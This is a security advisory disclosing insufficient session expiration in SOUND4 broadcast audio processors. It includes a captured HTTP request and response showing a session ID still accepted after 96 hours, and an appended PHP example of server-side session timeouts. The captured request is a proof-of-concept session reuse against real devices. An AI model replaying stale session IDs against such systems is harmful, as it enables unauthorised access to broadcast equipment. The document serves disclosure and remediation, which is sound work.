SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Version affected: 4.1.102
Summary: SOUND4 IMPACT is an ingenious process that combines mono and stereo sound.
To achieve perfect stereo processing, each part of the signal is processed individually,
giving consistency in both sound quality and level. In moving reception, when the FM
receiver changes from mono to stereo and then back again, the volume and sound variation
is reduced by more than 90%. A stereo expander is an option in the SOUND4 IMPACT
processing chain, basically without limitations.
SOUND4 is a powerful and versatile product that offers advanced functionality.
PULSE offers clients the best price-performance ratio. It is more than a processor:
it is flexible and powerful. The sound quality of this product is fully compatible
with radio broadcasting standards. It can also be used for streaming, DAB and FM
simultaneously.
SOUND4 FIRST offers all of the essential functions you require from high performance
FM/HD processors. It is affordable and designed to produce a high-quality sound.
It provides 2-band processing, a digital stereo generator and the clipper for IMPACT.
Desc: The application suffers from insufficient session expiration. This
happens when the web application lets an attacker reuse old session
credentials or session IDs for authorization. Insufficient session expiration
increases the device's exposure to attacks that could steal or reuse users'
session identifiers.
Tested on: Apache/2.4.25 (Unix)
           OpenSSL/1.0.2k
           PHP/7.1.1
           GNU/Linux 5.10.43 (armv7l)
           GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab – https://www.zeroscience.mk – @zeroscience
Advisory ID: ZSL-2022-5724
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php
26.09.2022
—
Session valid after 96 hours:

POST /checklogin.php HTTP/1.1
Host: RADIO
Cookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0
Content-Length: 34
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://RADIO
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://RADIO/linkandshare.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

session=q9rooqkl3kl20aianmveimu23q

HTTP/1.1 200 OK
Date: Sat, 03 Feb 1970 11:13:19 GMT
Server: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1
X-Powered-By: PHP/7.1.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: User-Agent
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
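
One way to enforce expiry on the server side, as an added example that is not SOUND4's code and not part of the original advisory: a PHP guard that applies both an idle and an absolute timeout to every request. The timeout values, function names and $_SESSION keys are assumptions.

```php
<?php
// Added example, not SOUND4 code. Timeouts, function names and $_SESSION keys are assumptions.
// session.gc_maxlifetime alone is not enforcement: PHP's session GC runs probabilistically,
// so stale session data can stay usable until the application itself rejects it.
const IDLE_TIMEOUT     = 900;    // 15 minutes without a request (assumed policy)
const ABSOLUTE_TIMEOUT = 28800;  // 8 hours since login, active or not (assumed policy)

/** Pure check: is this session record too old at $now? Missing timestamps fail closed. */
function session_is_expired(array $s, int $now): bool
{
    if (!isset($s['created_at'], $s['last_seen'])) {
        return true;
    }
    return ($now - $s['last_seen']) > IDLE_TIMEOUT
        || ($now - $s['created_at']) > ABSOLUTE_TIMEOUT;
}

/** Call once after credentials are verified (session already started): new ID, fresh timestamps. */
function session_begin(string $user): void
{
    session_regenerate_id(true);   // invalidate the pre-login ID
    $now = time();
    $_SESSION = ['user' => $user, 'created_at' => $now, 'last_seen' => $now];
}

/** Call at the top of every authenticated endpoint; false means "send to login". */
function session_guard(): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start(['use_strict_mode' => 1]);   // refuse IDs the server never issued
    }
    if (session_is_expired($_SESSION, time())) {
        $_SESSION = [];
        session_destroy();         // delete server-side data so the old ID is dead
        return false;
    }
    $_SESSION['last_seen'] = time();   // sliding idle window
    return true;
}
```

Under these assumed limits, a session ID presented 96 hours after login, as in the request above, fails the absolute-timeout check and its server-side data is destroyed.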